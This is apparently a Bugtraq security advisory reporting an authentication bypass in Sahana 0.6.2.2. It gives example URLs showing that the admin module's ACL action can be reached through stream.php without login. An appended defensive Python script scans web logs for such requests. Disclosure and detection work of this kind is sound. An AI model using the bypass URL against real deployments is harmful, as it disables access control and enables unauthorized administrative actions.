Sahana 0.6.2.2 Authentication Bypass

From: Christopher <vooduhal@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Sahana 0.6.2.2 Authentication Bypass
Date:


Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.
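
Added example, not part of the original post: a log check a defender could run to find requests that reached the admin module through stream.php instead of index.php. The log format, sample lines and the function name find_stream_admin_requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (common log format); clients, times and
# status codes are made up, and "mod=xyz" is a placeholder module name.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2010:10:00:01 +0000] "GET /sahana/index.php?mod=admin&act=acl_enable_acl HTTP/1.1" 302 0
198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /sahana/stream.php?mod=admin&act=acl_enable_acl HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2010:10:02:00 +0000] "GET /sahana/stream.php?mod=xyz&act=view HTTP/1.1" 200 2048
203.0.113.9 - - [01/Jan/2010:10:03:00 +0000] "POST /sahana/stream.php?act=acl_enable_acl&mod=ADMIN HTTP/1.1" 200 300
not a request record
"""

# Captures: client, timestamp, method, request target, status code.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_stream_admin_requests(log_text, sensitive_mods=("admin",)):
    """Return requests that reach a sensitive module through stream.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not request records
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        # Match stream.php as a path segment so PATH_INFO suffixes still count.
        if "stream.php" not in url.path.lower().split("/"):
            continue
        query = parse_qs(url.query)  # also decodes percent-encoding
        mods = {v.strip().lower() for v in query.get("mod", [])}
        if mods & set(sensitive_mods):
            hits.append({
                "client": client,
                "time": when,
                "method": method,
                "act": query.get("act", [""])[0],
                "status": int(status),
            })
    return hits


if __name__ == "__main__":
    for hit in find_stream_admin_requests(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in an access log, so this check only sees mod and act values carried in the query string.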




